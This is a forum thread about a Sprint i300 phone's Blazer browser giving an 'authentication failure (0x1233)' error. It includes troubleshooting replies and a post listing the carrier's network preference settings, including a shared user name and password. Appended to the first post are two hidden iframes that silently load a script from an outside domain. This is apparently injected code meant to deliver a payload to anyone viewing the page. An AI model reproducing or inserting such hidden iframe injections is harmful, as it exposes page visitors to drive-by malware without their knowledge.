+ Reply to Thread
Results 1 to 8 of 8
  1. #1
    Registered User
    Join Date
    01-03-2002
    Posts
    14

    Problem w/Blazer

    I just got my i300 yesterday, and so far, I love it. However, when I try to use the Bazer browser that was provided with it, I get as far as the "goto" step, and when I enter a URL, I keep getting a "authentication failure (0x1233)" message. I have the phone turned on, and the Sprint browser works fine. I'm new to Palms in general and the "wireless web" in particular, so forgive me if this is a stupid question.
    Have I missed a step somewhr? Do I have to use another ISP for Blazer? What am I doing wrong?
    Thanks!
    Craig
    (Yeah, I know there is a better version of Blazer, Ijust haven't had a chance to downlad/install it yet!)<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    Administrator
    Join Date
    10-21-2001
    Posts
    26,048

    Arrow

    (Yeah, I know there is a better version of Blazer, Ijust haven't had a chance to downlad/install it yet!)
    well, until you do that not much can be posted...

    blazer works out of the box without the user having to do anythin but install it and type in the correct url... get 2.0 and if you still have the problem, then post.

  3. #3
    Registered User
    Join Date
    01-03-2002
    Posts
    14
    That's what I'm saying, I installed it "out of the box", and when I type in the URL, I get the error message I indicated.
    Craig

  4. #4
    Administrator
    Join Date
    10-21-2001
    Posts
    26,048

    Arrow

    well im saying get 2.0 installed first and see if that will work for ya...

    be sure and UNINSTALL the old version first b4 installing th newer version.. that will be one less place to question if things still go wrong..

  5. #5
    Registered User
    Join Date
    12-26-2001
    Posts
    35

    Re: Problem w/Blazer

    You may have a bad proxy server configuration.
    Does this happen with all URLs, or just one particular URL?
    The home page is set to Sprint PCS -- have you tried some of the links on that page, and do you still get the problem there? Do you even get the SprintPCS home page automatically, or do you just get a blank page?

    The problem may also be that the proxy server doesn't recognize your phone. I'm not sure but I think the pre-installed copy of Blazer uses Sprint's proxy rather than Handspring's -- For this reason I recommend you DON'T upgrade to 2.0 until you get this problem solved. Try calling Sprint and make sure your account is properly set up.



    Originally posted by GCraig
    I just got my i300 yesterday, and so far, I love it. However, when I try to use the Bazer browser that was provided with it, I get as far as the "goto" step, and when I enter a URL, I keep getting a "authentication failure (0x1233)" message. I have the phone turned on, and the Sprint browser works fine. I'm new to Palms in general and the "wireless web" in particular, so forgive me if this is a stupid question.
    Have I missed a step somewhr? Do I have to use another ISP for Blazer? What am I doing wrong?
    Thanks!
    Craig
    (Yeah, I know there is a better version of Blazer, Ijust haven't had a chance to downlad/install it yet!)

  6. #6
    Registered User
    Join Date
    02-25-2002
    Posts
    1

    Sprint Network Preferences

    I was getting the authentication failure 0x1233 with both Blazer and Eudora.

    After lots of time on hold, I got passed to 1-888-298-0756, where I spent twice that amount of time on hold.

    When the representitive did pick up, however, the problem was easily solved. I asked for the fields that should be in network preferences. They worked for my phone, and, because of the appearant insecure password, I am posting them here because they're probably the same for everybody. If not, just call 'em up (using a speaker fone, so waiting is less painful) and get it.


    Service: Sprint PCS
    User Name: web
    Password: web
    Connection: Wireless CDMA Modem
    Phone: #2932

    When I originally set my phone up, I think everything was right except for the password. Good luck!

  7. #7
    Registered User
    Join Date
    01-03-2002
    Posts
    14
    Sorry, guys,
    I thought I had posted that the problem was solved by a call to customer service and changing the prefs. Must have posted it under another thread.
    All is well and thanks for the help!
    GCraig

  8. #8
    Registered User
    Join Date
    02-28-2002
    Posts
    149
    had the same problem...all you need to do is set your modem setting to wireless CDMA modem instead of wireless modem in preferences...

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts